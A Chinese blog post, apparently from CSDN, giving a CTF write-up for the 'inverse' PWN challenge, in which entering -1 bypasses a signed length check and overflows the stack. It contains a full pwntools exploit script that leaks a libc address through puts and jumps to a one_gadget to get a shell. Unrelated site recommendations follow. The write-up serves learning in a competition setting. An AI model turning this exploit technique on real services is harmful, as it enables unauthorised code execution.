HWS-CTF-第七期山大站-PWN-【inverse】

已于 2024-01-06 19:02:48 修改
阅读量285 收藏
点赞数 6
分类专栏: HWS-CTF-第七期山大站 文章标签: java 服务器 开发语言
于 2023-11-19 22:29:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/llovewuzhengzi/article/details/134496650
版权

文章目录


第一次真正意义上独立在比赛中做出题目来了,距离真正意义接触CTF-PWN差不多正好两个月。但由于不知道靶场要自己开而且端口每次自己打开会改,交flag稍微晚了些(我太菜了)

inverse

main

在这里插入图片描述

work

在这里插入图片描述
这里很明显发现符号转换的bug,即nbytes对应有符号数为-1时可以造成溢出

read_int

将输入的字符转换为int类型(字符为负数也会转换)
在这里插入图片描述

read_n

往字符数组输入字符
在这里插入图片描述

思路

onegadget

在这里插入图片描述
ROPgadget

在这里插入图片描述
在这里插入图片描述

首先patchelf换库
然后通过输入字符-1使得绕过检查,随后-1对应0xffffffff(32位),再次read时造成溢出,构造payload,先将返回地址覆盖为puts函数的地址,然后下一个为work函数的地址(puts的返回地址),然后是puts的参数,为puts的got表的地址,然后第一次work造成puts地址泄露,(先通过one_gadget找到可用的gadget,最后选择0x6749f的,因为esi一般都是符合其要求的,然后eax比较好找对应的gadget,如上图)从而得到libc基地址,然后第二次work时同样输入字符-1,随后将返回地址覆盖为pop eax;ret的gadget的地址,然后是0,最后是onegadget的地址,最后成功getshell

exp

from pwn import*
#context(os="linux",arch="i386",log_level="debug")
s=remote("124.71.135.126",30043)
#s=process("./pwn")
f=ELF("./pwn")
libc=ELF("./libc-2.27.so")
#gdb.attach(s,"b main")
s.recvuntil(b"input world tag: ")
s.sendline(b"1")
s.sendline(b"-1")
s.recvuntil(b"leave me a msg:")
payload=b"a"*64+p32(f.sym["puts"])+p32(f.sym["work"])+p32(f.got["puts"])
#+f.got["puts"]
s.sendline(payload)
put_addr=u32(s.recvline()[0:4])
libc_base=put_addr-libc.sym["puts"]

system_addr=libc_base+0x6749f 
payload=b"a"*64+p32(0x00024d37+libc_base)+p32(0)+p32(system_addr)
s.sendline(b"-1")
s.recvuntil(b"leave me a msg:")

s.sendline(payload)
# print(hex(u32(put_addr)))
s.interactive()
看星猩的柴狗
关注
  • 6
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
K1N5819HWS-7-F SOD-323 SL.pdf
04-24
1. K1N5819HWS-7-F是一款肖特基二极管(SBD),其型号为K1N5819HWS-7-F,采用SOD-323小型表面贴装封装形式(SL)。 2. 肖特基二极管特性: - 低正向电压肖特基整流器(Low Forward Voltage Schottky Rectifier)。...
CTF利用大佬们的webshell拿取flag
Javachichi的博客
04-27 623
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。这份完整版的网络安全(黑客)全套学习资料已经上传至CSDN官方,朋友们如果需要点击下方链接即可前往获取【保证100%免费】。我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。学习黑客常用的开发软件都在这里了,给大家节省了很多时间。比较早的一场CTF了,做了几个web。而upload最为显著了,发现存在目录遍历。
东大学网络攻击与防范2024.1
m0_51492451的博客
01-03 1342
由于一台服务器可用的TCP连接是有限的,如果恶意攻击方快速连续的发送此类连接请求,则服务器可用的TCP连接队列将会很快阻塞,系统资源和可用带宽急剧下降,无法提供正常网络服务,从而造成拒绝服务。对于目的主机而言是从出口节点发来信息,要注意的是明文信息即使在TOR网络中是加密的,离开TOR后仍然是明文的。在破解中常将74换成75,比如在输入密码是,可能是判断密码正确就跳转74,但是我们输入的都猜不对,就会顺序执行到错误的出口,如果我们改成跳转74,那么输入一个错误密码就能跳转到正确出口,登录成功。
东大学网络安全靶场实验平台——团队进度(一)
qq_50860232的博客
03-12 8343
东大学网络安全靶场实验平台——团队进度(一)序言一、架构设计二、网站搭建2.1 前端搭建2.2 后端搭建三、docker配置四、靶场页面的编写 序言 现在是系列文章第二篇 上一篇:东大学网络安全靶场实验平台——团队及项目介绍 经过两周的项目设计和编写,我们的进度如下: 一、架构设计 二、网站搭建 2.1 前端搭建 2.2 后端搭建 三、docker配置 四、靶场页面的编写 ...
2023-HWS-PWN-WP
weixin_51480590的博客
07-17 388
这次比赛运气比较好,把pwn ak了。
hws-genoonan:GitHub Classroom创建的hws-genoonan
02-09
标题“hws-genoonan:GitHub Classroom创建的hws-genoonan”表明这是一个在GitHub Classroom平台上创建的项目,项目名是“hws-genoonan”。GitHub Classroom是一个专门为教育者设计的工具,它允许教师创建、管理和...
hws-rhull21:GitHub Classroom创建的hws-rhull21
02-27
【标题解析】:“hws-rhull21:GitHub Classroom创建的hws-rhull21”这个标题表明,这是一个在GitHub Classroom环境中创建的项目,名为“hws-rhull21”。GitHub Classroom是一个用于教育的平台,允许教师创建、管理...
hws-PortilloD:GitHub Classroom创建的hws-PortilloD
04-12
【标题】"hws-PortilloD:GitHub Classroom创建的hws-PortilloD" 提供的信息表明,这个项目是通过GitHub Classroom建立的,可能是一个教育环境中的作业或项目。GitHub Classroom是一个工具,允许教师轻松地分发、收集...
hws-mford4:GitHub Classroom创建的hws-mford4
03-16
【标题】"hws-mford4:GitHub Classroom创建的hws-mford4"指的是一个在GitHub Classroom平台上创建的作业或项目,通常用于教学环境中。这个项目可能是一个编程作业或者一个团队协作的学习任务,让学生们练习特定的...
JAVA进阶补充
2301_80150315的博客
08-15 879
概念:把已经有的方法拿过来用,当作函数式接口中抽象方法的方法体条件:引用处必须是函数式接口被引用的方法需要已经存在被引用方法的形参和返回值需要跟抽象方法的形参和返回值保持一致被引用方法的功能需要满足当前需求:方法引用符意义:就是为让控制台的报错信息更加的见名知意自定义异常的步骤:定义异常类写继承关系空参构造带参构造​file对象就表示一个路径,可以是文件的路径、也可以是文件夹的路径;这个路径可以是存在的,也允许是不存在的构造方法描述根据文件路径创建对象。
进程间通信 ---共享内存
BUG制造机的博客
08-14 1043
在这篇文章中向大家介绍了共享内存的原理以及常用的指令函数,希望大家有所收获!😁。
手撕快排——三种实现方法(附动图及源码)
最新发布
jsjs1346的博客
08-16 570
🤖💻👨‍💻👩‍💻🌟🚀🤖🌟👨‍💻👩‍💻👨‍💻👩‍💻🚀是一种高效的排序算法,广泛应用于各种场景。它采用策略,将一个数组分成两个子数组,然后递归地对这两个子数组进行排序。本文将介绍三种快速排序的实现方法,并附上相应的源码。⚙️一、快速排序的基本原理一个基准元素(pivot)分成两个子数组递归合并O(n log n)O(n log n)O(n^2)后文我们将给出优化方案O(log n)📚三、实现霍尔方法是快速排序原始版本中使用的分区方法。
Java Spring|day3.SpringBoot
weixin_60364343的博客
08-15 349
告诉Spring boot需要什么功能,它就能引入需要的依赖库起步依赖就是特殊的Maven依赖,利用了传递依赖解析,把常用库聚合在一起,组成几个为特定功能而定制的依赖。
旅游网站
weixin_43213064的博客
08-16 638
【代码】springboot旅游网站
构造方法,JavaBean,对象内存图,基础数据类型和引用数据类型
qq_63126439的博客
08-14 289
栈内存处理完数据之后会退出,指向推内存的箭头都会消失,当没有人指向他的时候,堆内存中的数据也会被移除。带参构造方法和无参数构造方法,两者方法名相同,但参数不同,这叫做构造方法的重载。方法区,新增元空间,把原来的方法区的多种功能进行了拆分。创造对象的时候,虚拟机会自动调用构造方法,作用是给成员变量进行初始化的。只要是看见new就会在堆内存创建新的空间,两个空间是独立的,互不影响。基础数据类型,在变量当中存储真实的数据值,和其他空间没有任何关系。使用其他空间的数值,自己的空间存储的是地址值。
基于JAVA生产制造执行系统设计与实现(源码+论文+讲解等)
程序员阿龙的博客
08-13 1072
当下,如果 还依然使用纸质文档来记录并且管理相关信息,可能会出现很多问题,比如原始文件的丢失,因为采用纸质文档,很容易受潮或者怕火,不容易备份,需要花费大量的人员和资金来管理用纸质文档存储的信息,最重要的是数据出现问题寻找起来很麻烦,并且修改也困难,如果还这样操作会造成很大的资源浪费和经济损失。所以,对于本课题研究的产品生产制造信息的管理就需要有一款软件来代替手工操作,因此MES生产制造执行系统就应运而生。MES生产制造执行系统运用的工具包括Eclipse,Tomcat以及Navicat等。
总结常见报错信息
m0_68903702的博客
08-16 163
在@Controller注解中,返回的是字符串或者是字符串匹配的模板名称,即直接渲染视图,与html页面配合使用的,java后端的代码要结合html的情况进行渲染,使用model对象(或者modelandview)的数据将填充user视图中的相关属性,然后展示到浏览器;而在@RestController中,返回的应该是一个对象,即return一个user对象,这时,在没有页面的情况下,也能看到返回的是一个user对象对应的json字符串。情形一:若前端传入Json格式,后端使用。
基于vue框架的爱看电影网站v4o92(程序+源码+数据库+调试部署+开发环境)系统界面在最后面。
h2345678的博客
08-15 957
项目功能:用户,电影分类,电影信息,电影评分基于Vue框架的爱看电影网站项目功能丰富多样,旨在为用户提供一个集电影浏览、信息查询、观影体验、互动交流于一体的综合性平台。
编写-hws函数来判断参数是否为回文数
05-22
以下是一个简单的 Python 函数,用于判断一个数是否为回文数: ```python def is_palindrome(num): """ 判断一个数是否为回文数 """ str_num = str(num) return str_num == str_num[::-1] def hws(num): """ 判断一个数是否为回文数,如果是回文数返回 True,否则返回 False """ if is_palindrome(num): return True else: return False ``` 首先,我们定义了一个辅助函数 `is_palindrome`,它将数字转换为字符串并比较其反转字符串是否与原始字符串相等。如果是,则该数字为回文数,否则不是。 然后,我们定义了 `hws` 函数。它将传递的数字作为参数,并调用 `is_palindrome` 函数来检查该数字是否为回文数。如果是,则 `hws` 函数返回 `True`,否则返回 `False`。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

看星猩的柴狗

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值